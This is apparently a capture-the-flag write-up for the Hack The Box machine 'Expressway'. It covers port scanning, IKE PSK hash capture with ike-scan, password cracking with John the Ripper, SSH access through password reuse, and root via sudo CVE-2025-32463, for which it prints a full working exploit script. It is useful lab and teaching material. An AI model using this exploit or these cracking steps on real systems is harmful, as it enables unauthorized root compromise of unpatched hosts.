Description
Expressway is an easy Hack The Box machine that features:
- IKE IPSec server enumeration and PSK recovery
- Password Reuse for Linux user
- Privilege Escalation via a vulnerable SUDO application
Footprinting
First, we are going to check with ping command if the machine is active and the system operating system. The target machine IP address is 10.129.62.220.
$ ping -c 3 10.129.62.220
PING 10.129.62.220 (10.129.62.220) 56(84) bytes of data.
64 bytes from 10.129.62.220: icmp_seq=1 ttl=63 time=48.0 ms
64 bytes from 10.129.62.220: icmp_seq=2 ttl=63 time=48.7 ms
64 bytes from 10.129.62.220: icmp_seq=3 ttl=63 time=47.5 ms
--- 10.129.62.220 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2004ms
rtt min/avg/max/mdev = 47.508/48.072/48.719/0.497 ms
The machine is active and with the TTL that equals 63 (64 minus 1 jump) we can assure that it is an Unix machine. Now we are going to do a Nmap TCP SYN port scan to check all opened ports.
$ sudo nmap 10.129.62.220 -sS -oN nmap_scan
Starting Nmap 7.95 ( https://nmap.org )
Nmap scan report for 10.129.62.220
Host is up (0.049s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
Nmap done: 1 IP address (1 host up) scanned in 1.02 seconds
We get one open port, 22. We move to enumerate UDP ports.
$ sudo nmap 10.129.62.220 -sU --top-ports 100 -oN nmap_scan_udp
Starting Nmap 7.95 ( https://nmap.org )
Nmap scan report for 10.129.62.220
Host is up (0.049s latency).
Not shown: 96 closed udp ports (port-unreach)
PORT STATE SERVICE
68/udp open|filtered dhcpc
69/udp open|filtered tftp
500/udp open isakmp
4500/udp open|filtered nat-t-ike
Nmap done: 1 IP address (1 host up) scanned in 111.76 seconds
We find opened the 500 UDP port, isakmp one.
Enumeration
Then we do a more advanced scan, with service version and scripts.
$ nmap 10.129.62.220 -Pn -sV -sC -p22 -oN nmap_scan_ports
Starting Nmap 7.95 ( https://nmap.org )
Nmap scan report for 10.129.62.220
Host is up (0.048s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 10.0p2 Debian 8 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.58 seconds
$ nmap 10.129.62.220 -Pn -sU -sV -sC -p500 -oN nmap_scan_ports_udp
Starting Nmap 7.95 ( https://nmap.org )
Nmap scan report for 10.129.62.220
Host is up (0.049s latency).
PORT STATE SERVICE VERSION
500/udp open isakmp?
| ike-version:
| attributes:
| XAUTH
|_ Dead Peer Detection v1.0
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 127.98 seconds
We add the expressway.htb host to the /etc/hosts file.
$ echo "10.129.62.220 expressway.htb" | sudo tee -a /etc/hosts
As we do not have feasible credentials for the SSH, we enumerate the isakmp service in UDP port 500, related to IPSec. IPSec is a protocol suite that secures IP communications by providing encryption, authentication, and integrity. IKE is a protocol used to negotiate and manage the keys and security settings needed for IPSec connections. We find that it supports XAUTH authentication and it is using the Cisco Dead Peer Detection v1.0.
Exploitation
We the fingerprint of the IPSec service we find that the Cisco module is vulnerable to group name enumeration and PSK key retrieve. Due to the device(s) returning differing responses to IKE requests it is possible to enumerate valid group names from the VPN device(s).Β With the correct group name the pre-shared key can then be captured and a brute-force attack carried out off-line. We start by doing a simple enumeration with ike-scan tool.
$ ike-scan 10.129.62.220
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.129.62.220 Main Mode Handshake returned HDR=(CKY-R=a8119e135787b4e2) SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) VID=09002689dfd6b712 (XAUTH) VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
Ending ike-scan 1.9.6: 1 hosts scanned in 0.056 seconds (17.93 hosts/sec). 1 returned handshake; 0 returned notify
We receive the handshake without problems. We are going to try to retrieve the PSK hash using the aggresive mode and saving it to the psk.txt file.
$ ike-scan -Ppsk.txt -M -A 10.129.62.220
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.129.62.220 Aggressive Mode Handshake returned
HDR=(CKY-R=330b4480f89ece23)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
KeyExchange(128 bytes)
Nonce(32 bytes)
ID(Type=ID_USER_FQDN, Value=ike@expressway.htb)
VID=09002689dfd6b712 (XAUTH)
VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
Hash(20 bytes)
Ending ike-scan 1.9.6: 1 hosts scanned in 0.057 seconds (17.62 hosts/sec). 1 returned handshake; 0 returned notify
$ cat psk.txt
23d4731dc5d297c15ac302616d120cbf61290575c31eb847840c14abd05b0b5e1f7786d25c628759fe89329dff2ad5f6a4ecf806e43152cc3b31bee2b87715fbd74a87a01ddfb6f2114e78e81d82aeb3bad6eb78cacbc1af0ca57ed1686057a6aa941047e3bc9e887664df140899c4a5f0edb2daf645a7f38a09207db5bcc9e7:e25347f451887adb802e621c58f5faedb3cdd0f7dd984a57ecc66f6caaab37c61f5631528870bcbe8e9f18e517b463ba27838a96a7fe768d2445cf1d0e363d7de727a8ff6c064b97f178f01c2fb836156d05dc47db6567c23be418cc9b6fa2de5603d704bb91514f7b0414c649d6df1fb646fc07cf602c77ff157a0bd4998d7b:330b4480f89ece23:262cca0ba2adf846:00000001000000010000009801010004030000240101000080010005800200028003000180040002800b0001000c000400007080030000240201000080010005800200018003000180040002800b0001000c000400007080030000240301000080010001800200028003000180040002800b0001000c000400007080000000240401000080010001800200018003000180040002800b0001000c000400007080:03000000696b6540657870726573737761792e687462:e581237d502897085043cafde718ed93993155ee:497dfccd78ee1f18fc601029d9119092c93e4a54b2c2d9769730a2a0165381d8:0e5c8f90bb99a82f8444b610224dc8883557fcf8
We get a user of IPSec ike@expressway.htb, and a PSK hash with parameters. We are going to convert it to a format John The Ripper will understand and crack it.
$ ikescan2john psk.txt > psk.hash
$ john --wordlist=/usr/share/wordlists/rockyou.txt psk.hash
Using default input encoding: UTF-8
Loaded 1 password hash (IKE, PSK [HMAC MD5/SHA1 32/64])
Cost 1 (hash algorithm used for hmac [1:MD5 2:SHA1]) is 2 for all loaded hashes
Will run 16 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
freakingrockstarontheroad (?)
1g 0:00:00:01 DONE 0.8196g/s 6593Kp/s 6593Kc/s 6593KC/s fredjohnson..frazel03
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
We recovered the PSK for the IPSec service, freakingrockstarontheroad We find that we can login in the machine using SSH with the ike username and the recovered password.
$ ssh ike@expressway.htb
ike@expressway.htb's password:
...
ike@expressway:~$ id
uid=1001(ike) gid=1001(ike) groups=1001(ike),13(proxy)
Post-Exploitation
We find that ike user is part of the proxy group. As console user, we also find root.
ike@expressway:~$ grep sh /etc/passwd
root:x:0:0:root:/root:/bin/bash
sshd:x:101:65534::/run/sshd:/usr/sbin/nologin
ike:x:1001:1001:ike,,,:/home/ike:/bin/bash
Enumerating the Sudo version, we find that the system is using version 1.9.17.
ike@expressway:~$ sudo --version
Sudo version 1.9.17
Sudoers policy plugin version 1.9.17
Sudoers file grammar version 50
Sudoers I/O plugin version 1.9.17
Sudoers audit plugin version 1.9.17
Sudo before 1.9.17p1 allows local users to obtain root access because /etc/nsswitch.conf from a user-controlled directory is used with the --chroot option, CVE-2025-32463. We have a proof of concept in Github created by kh4sh3i. We use the exploit to trigger the vulnerability and obtain root permissions.
ike@expressway:~$ cat<<'EXPLOITEND' > /tmp/sudo-chwoot.sh
#!/bin/bash
STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)
cd ${STAGE?} || exit 1
cat > woot1337.c<<EOF
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor)) void woot(void) {
setreuid(0,0);
setregid(0,0);
chdir("/");
execl("/bin/bash", "/bin/bash", NULL);
}
EOF
mkdir -p woot/etc libnss_
echo "passwd: /woot1337" > woot/etc/nsswitch.conf
cp /etc/group woot/etc
gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c
echo "woot!"
sudo -R woot woot
rm -rf ${STAGE?}
EXPLOITEND
ike@expressway:~$ bash /tmp/sudo-chwoot.sh
woot!
root@expressway:/# id
uid=0(root) gid=0(root) groups=0(root),13(proxy),1001(ike)
Flags
In the root shell we can retrieve the user and root flags.
root@expressway:/# cat /home/ike/user.txt
<REDACTED>
root@expressway:/# cat /root/root.txt
<REDACTED>